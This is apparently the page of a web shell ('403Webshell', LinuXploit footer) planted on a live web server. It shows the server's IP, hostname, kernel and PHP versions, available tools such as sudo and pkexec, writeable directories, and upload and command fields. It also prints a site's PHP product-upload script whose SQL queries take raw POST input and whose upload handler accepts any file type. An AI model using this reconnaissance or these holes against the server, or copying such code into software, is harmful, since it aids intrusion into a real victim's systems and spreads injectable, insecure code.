403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/(Del)yuecreations.com.hk/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/(Del)yuecreations.com.hk/webadmin/productdetail_add.php
<?php require("configure.php"); ?>
<?
$ProductGradeId				= $_POST["ProductGradeId"];
$Sort						= $_POST["Sort"];
$Hotproduct					= $_POST["Hotproduct"];

$NameEN	= htmlspecialchars($_POST["pdetnameen"],ENT_QUOTES);
$DescEN	= $_POST["pdetdescen"];

$NameTC	= htmlspecialchars($_POST["pdetnametc"],ENT_QUOTES);
$DescTC	= $_POST["pdetdesctc"];

print_r($_POST);

$sql = "select max(ProductId) as maxid ";
$sql .= "from Product ";
$result=mysql_query($sql);
$row = mysql_fetch_array($result,MYSQL_ASSOC);
$ProductId = $row{maxid}+1;

if ($_FILES['pdetimage']['name'] <> '')
	{
		copy ($_FILES['pdetimage']['tmp_name'], "product/".$ProductId.$_FILES['pdetimage']['name']) 
			or die ("Could not copy");
		
		$pdetimage = $ProductId.$_FILES['pdetimage']['name'];
		
		$image = "product/".$ProductId.$_FILES['pdetimage']['name'];
		createthumb($image, $image, 600, 600);
		
		copy ($_FILES['pdetimage']['tmp_name'], "productthumb/".$ProductId.$_FILES['pdetimage']['name']) 
			or die ("Could not copy"); 
			
		$imagethumb = "productthumb/".$ProductId.$_FILES['pdetimage']['name'];
		createthumb($imagethumb, $imagethumb, 145, 145);
			 
	}
	else
	{
		$pdetimage = "";
	}


function createthumb($name,$filename,$new_w,$new_h)
	{
	$system=explode('.',$name);
	if (preg_match('/jpg|jpeg|JPG|JPEG/',$system[1])){
		$src_img=imagecreatefromjpeg($name);
	}
	if (preg_match('/gif|GIF/',$system[1])){
		$src_img=imagecreatefromgif($name);
	}
	if (preg_match('/png|PNG/',$system[1])){
		$src_img=imagecreatefrompng($name);
	}

	$old_x=imageSX($src_img);
	$old_y=imageSY($src_img);
	if ($old_x > $old_y) {
		$thumb_w=$new_w;
		$thumb_h=$old_y*($new_h/$old_x);
	}
	if ($old_x < $old_y) {
		$thumb_w=$old_x*($new_w/$old_y);
		$thumb_h=$new_h;
	}
	if ($old_x == $old_y) {
		$thumb_w=$new_w;
		$thumb_h=$new_h;
	}

	$dst_img = imagecreatetruecolor($thumb_w,$thumb_h);
	imagecopyresampled($dst_img,$src_img,0,0,0,0,$thumb_w,$thumb_h,$old_x,$old_y); 
	$red = imagecolorallocate($dst_img, 255, 0, 0);
	$green = imagecolorallocate($dst_img, 0, 255, 0);
	$blue = imagecolorallocate($dst_img, 0, 0, 255);
	$black = imagecolorallocate($dst_img, 0, 0, 0);
	// Make the background transparent
	imagecolortransparent($dst_img, $black);

	// Draw a red rectangle
	imagefilledrectangle($dst_img, 4, 4, 50, 25, $red, $green, $blue);


	if (preg_match("/png|PNG/",$system[1])){		
		imagepng($dst_img, './imagecolortransparent.png'); 
	} else if (preg_match("/gif|GIF/",$system[1])) {
		imagegif($dst_img, './imagecolortransparent.gif'); 
	} else {
		imagejpeg($dst_img,$filename); 
	}
	imagedestroy($dst_img); 
	imagedestroy($src_img); 
}

if ($Sort == '' || $Sort == '0') {
	$sql = "select max(Sort) as maxid ";
	$sql .= "from Product where ProductGradeId = $ProductGradeId ";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result,MYSQL_ASSOC);
	$Sort = $row{maxid}+1;
}
if( mysql_num_rows(mysql_query("SELECT ProductGradeId FROM Product WHERE ProductGradeId = $ProductGradeId AND Sort=$Sort ")) > 0){
	mysql_query("UPDATE Product SET Sort= Sort+1 WHERE ProductGradeId = $ProductGradeId AND Sort >=$Sort ");
}

mysql_query("insert into Product (ProductId, ProductGradeId, NameEN, NameTC, DescEN, DescTC, ImagePath, Hotproduct, Sort) 
						values ('$ProductId', '$ProductGradeId', '$NameEN', '$NameTC', '$DescEN', '$DescTC', '$pdetimage', '$Hotproduct', '$Sort')");
						
// echo "insert into Product (ProductId, ProductGradeId, NameEN, NameTC, DescEN, DescTC, ImagePath, Hotproduct, Sort)  values ('$ProductId', '$ProductGradeId', '$NameEN', '$NameTC', '$DescEN', '$DescTC', '$pdetimage', '$Hotproduct', '$Sort')"; 
						
mysql_close($dbh);

header("Location: productdetail_index.php?ProductGradeId=$ProductGradeId&msg=Update Successful");
?>

Youez - 2016 - github.com/yon3zu
LinuXploit